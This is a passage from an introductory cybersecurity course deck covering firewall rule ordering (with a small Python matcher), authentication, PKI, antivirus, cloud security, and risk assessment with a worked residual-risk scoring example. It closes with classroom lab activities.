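    return rule_net == ANY or ip_address(addr) in ip_network(rule_net)


def rule_matches(rule, packet):
    """packet = (src_ip, dst_ip, proto, dst_port)."""
    action, src, dst, proto, port = rule
    src_ip, dst_ip, pkt_proto, pkt_port = packet
    return (_addr_matches(src, src_ip)
            and _addr_matches(dst, dst_ip)
            and (proto == ANY or proto == pkt_proto)
            and (port is None or port == pkt_port))


def decide(packet, rules=RULES):
    """Return the action of the first matching rule; deny if nothing matched (fail closed)."""
    for rule in rules:
        if rule_matches(rule, packet):
            return rule[0]
    return "deny"


if __name__ == "__main__":
    for pkt in [("203.0.113.5", "192.168.1.10", "tcp", 443),   # web visitor -> LAN server
                ("203.0.113.5", "192.168.1.10", "tcp", 22),    # SSH from the Internet
                ("192.168.1.10", "8.8.8.8", "udp", 53)]:       # LAN host resolving DNS
        print(pkt, "->", decide(pkt))
```

Moving the deny-all rule to the top silently blocks everything, which is the classic misordering mistake on real firewalls; conversely, omitting it and relying on the function's fallback is only safe because that fallback is deny. Real firewalls also track connection state, so reply packets for an allowed outbound session are admitted without a separate inbound rule.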
Strong Authentication
68

 An absolute requirement
 Two-factor authentication: combine two different kinds of factor
 Passwords (something you know)
 Tokens (something you have)
 Biometrics (something you are)
 Examples:
 Passwords
 Tokens
 Tickets
 Restricted access
 PINs
 Biometrics
 Certificates
Public Key Infrastructure
69

Framework that builds the network of trust
Combines public key cryptography and digital signatures to provide confidentiality, integrity, authentication, non-repudiation, and access control
Protects applications that require a high level of security
70

Certificate Authority (CA) - a trusted third party that issues and signs certificates, binding a public key to an identity
 Trusted by both the owner of the certificate and the party relying upon the certificate
Registration Authority (RA) - verifies the identity of applicants on behalf of the CA
 Users who wish to have their own certificate register with the RA
Validation Authority (VA) - tells relying parties whether a certificate is still valid (not expired or revoked), for example via OCSP
Antivirus software
71

Antivirus software, or anti-virus software, also known as anti-malware, is a computer program used to prevent, detect, and remove malware.
Antivirus programs depend on stored virus signatures -- unique strings of data that are characteristic of known malware.
They also scan our systems and networks for behaviours that may signal the presence of new, unknown malware, since signatures alone cannot catch what has not been seen before.
Part-IV
72

CLOUD SECURITY
What do we mean by the cloud?
73

It depends who you ask, but someone will mention:
 Infrastructure as a Service (IaaS)
 Platform as a Service (PaaS)
 Software as a Service (SaaS)
A website is not generally "the cloud" unless it has some form of personalised service
The cloud
74
Infrastructure as a Service
75

You could buy these as single items in the non-cloud world:
 Firewalls
 Servers
 Storage
By themselves they won't do much useful work; they need to be used in combination and have software added
Cloud Security
76

Cloud security is the protection of data, applications, and infrastructure involved in cloud computing.
Like any computing environment, cloud security involves maintaining adequate preventative protections so you:
 Know that the data and systems are safe.
How to maintain security of our data in cloud
77

Password Protection
Remote Access
Encrypted Data
Network Security
Backup Data
Part-V
78

RISK ASSESSMENT
&
RESPONSE POLICY
Risk management vs. cost of security
79

Risk mitigation
 The process of selecting appropriate controls to reduce risk to an acceptable level
The level of acceptable risk
 Determined by comparing the risk of security-hole exposure to the cost of implementing and enforcing the security policy
Assess the cost
 of certain losses, and do not spend more to protect something than it is actually worth
What is Risk Assessment
80

The goal of the risk assessment process is to apply a consistent methodology for assessing the ICT risks faced by the organisation. It provides the foundation for effective risk management and makes sure significant ICT risks and their potential business impacts are identified and assessed in a timely manner.
Risk assessment elements
81

The risk assessment process covers 3 key activities:
risk identification
risk analysis
risk evaluation
Risk identification
82
 Once we have established the context for the risk assessment, the next step is to identify the ICT risks that threaten the achievement of our business objectives or that create an opportunity to exceed them. There are numerous risk identification techniques we can use:
 One-to-one interviews
 Group discussions / facilitated workshops
 Questionnaires / surveys
 Strengths, weaknesses, opportunities, threats (SWOT) analysis
 Dependency modelling
 External environment / horizon scanning
 Scenario analysis
 Process mapping
Breakdown of a risk
83
 Event: A risk event is defined as something that could prevent the achievement of an objective, milestone or target, or something that could create an opportunity to exceed any of these things.

 Causes: The event may occur as a result of a number of causes that may be internal or external. Identifying the causes of a risk event will help us to better understand the risk and the interrelationships between different risks.

 Consequences: The consequences describe the outcomes of the risk event, if it were to occur. These may include service interruption, or impacts on safety, costs, reputation and/or regulations. Understanding the consequences of risks allows us to make sure we have appropriate strategies for risk mitigation and/or recovery.
Risk Analysis
84

1. Assess the likelihood and impact of the risk occurring in the absence of mitigating controls. This is referred to as the inherent risk rating and should be based on normal circumstances, that is, the most probable case as opposed to the worst-case scenario.
85

2. Identify and assess the effectiveness of the existing controls that are in place to mitigate the risk. Assessing control effectiveness accurately is important for making an accurate assessment of residual risk.
86

3. Assess the residual risk rating based on the effectiveness of the mitigating controls. As a rule, controls reduce the likelihood of the risk occurring. Some controls, however, reduce the impact of the risk once it has occurred; for example, a business continuity plan may reduce the impact of a natural disaster but not the likelihood of it occurring.
Risk evaluation
87

The final step in the risk assessment process is to evaluate whether the residual risk rating is acceptable or unacceptable. This is based on a comparison with the target risk rating, the level of risk the organisation has decided it is willing to tolerate.
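Added example, not from the slides, that carries the three risk-analysis steps and the evaluation through in code on a 5x5 likelihood/impact matrix. The band thresholds, the scenario (ransomware delivered by phishing), the controls and the step sizes they are credited with are all assumptions; the mechanics follow the slides: only effective controls count, a control lowers either likelihood or impact, and the residual rating is compared with the target.

```python
"""Added example (not from the slides): inherent vs. residual risk rating on a 5x5 matrix."""

BANDS = [(15, "high"), (8, "medium"), (1, "low")]   # score >= threshold -> band (assumed scale)
BAND_ORDER = ["low", "medium", "high"]


def score(likelihood, impact):
    """Both on a 1..5 scale; the rating is their product (1..25)."""
    if not (1 <= likelihood <= 5 and 1 <= impact <= 5):
        raise ValueError("likelihood and impact must be 1..5")
    return likelihood * impact


def band(risk_score):
    return next(name for threshold, name in BANDS if risk_score >= threshold)


def residual(likelihood, impact, controls):
    """Apply only controls assessed as effective; each lowers likelihood OR impact by `steps`."""
    for c in controls:
        if not c["effective"]:
            continue
        if c["reduces"] == "likelihood":
            likelihood = max(1, likelihood - c["steps"])
        elif c["reduces"] == "impact":
            impact = max(1, impact - c["steps"])
        else:
            raise ValueError(f"unknown control type {c['reduces']!r}")
    return likelihood, impact


def acceptable(residual_score, target_band):
    """Residual risk is acceptable when its band is no worse than the target band."""
    return BAND_ORDER.index(band(residual_score)) <= BAND_ORDER.index(target_band)


# Constructed worked example: ransomware delivered by phishing at a small firm.
INHERENT = (4, 5)   # likely, and severe if it happens
CONTROLS = [
    {"name": "mail filtering + awareness training", "reduces": "likelihood", "steps": 1, "effective": True},
    {"name": "offline, tested backups", "reduces": "impact", "steps": 2, "effective": True},
    {"name": "endpoint detection (bought, not yet deployed)", "reduces": "likelihood", "steps": 1, "effective": False},
]


def assess(inherent=INHERENT, controls=CONTROLS, target_band="medium"):
    """Run steps 1-3 and the evaluation; returns the inherent and residual ratings and the verdict."""
    inh = score(*inherent)
    res_l, res_i = residual(*inherent, controls)
    res = score(res_l, res_i)
    return {"inherent": (inh, band(inh)), "residual": (res, band(res)),
            "acceptable": acceptable(res, target_band)}


if __name__ == "__main__":
    print(assess())
```

The backup control lowers impact but not likelihood, exactly as the slides say of a business continuity plan, and the endpoint product that has been bought but not deployed contributes nothing, which is why control effectiveness has to be assessed rather than assumed. With a target of "low" the same residual rating is rejected, and the organisation either adds controls or formally accepts the excess.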
Developing a disaster recovery plan
88

Businesses should develop an IT disaster recovery plan. It begins by compiling an inventory of hardware (e.g. servers, desktops, laptops and wireless devices), software applications and data. The plan should include a strategy to ensure that all critical information is backed up.
Development of a data backup plan and ensuring the availability of inventory to keep the business running are the main factors.
Part-VI
89

LAB SESSIONS
Activity 1
90

Give examples of devices that form the cyberspace.
Lab-1
91

Give some examples of why we need to secure our part of the cyberspace.
Lab-2
92

As an activity: go to https://howsecureismypassword.net/
Try some dummy passwords and see how strong they are. Be creative, think out of the box. Never enter a password you actually use into a third-party website; make up ones of similar structure instead.
Lab-3
93

https://youtu.be/jV0Q_muo1wI

Watch the video and discuss ways to protect the reputation and customers of any business from scammers.
Lab-4
94
Ebony Coats Limited is a medium-sized law firm in Mauritius with a computer network comprising 25 nodes.
Currently the organization occupies a small building with no dedicated IT room and no IT department.
An obsolete antivirus system is poorly implemented. There is a domain, but with no effective group policy.
There are a few security cameras, which are faulty too.
Reports of equipment theft within the organization are increasing day by day.
Employees are not well trained in using the Internet and other IT systems.
The network is poorly managed.

Brainstorm a possible physical and network security plan, and give suggestions.
Lab-5
95

Your class has been assigned to carry out a risk assessment for a small business in Port Louis.
SCENARIO: An employee within your organization used the company's digital camera for business purposes. In the course of doing so, they took a scenic photograph that they then loaded onto their personal computer by inserting the SD card. The SD card was infected with malware while connected to the employee's personal computer. When re-inserted into a company machine, it infected the organization's system with the same malware.
Discussion questions
Who within the organization would you need to notify?
How would your organization identify and respond to malware infecting your system through this vector?
What is the process for identifying the infection vector?
What other devices could present similar threats?
What should management do?
How can you prevent this from occurring again?
Does your organization have training and policies in place to prevent this?
Do policies apply to all storage devices?
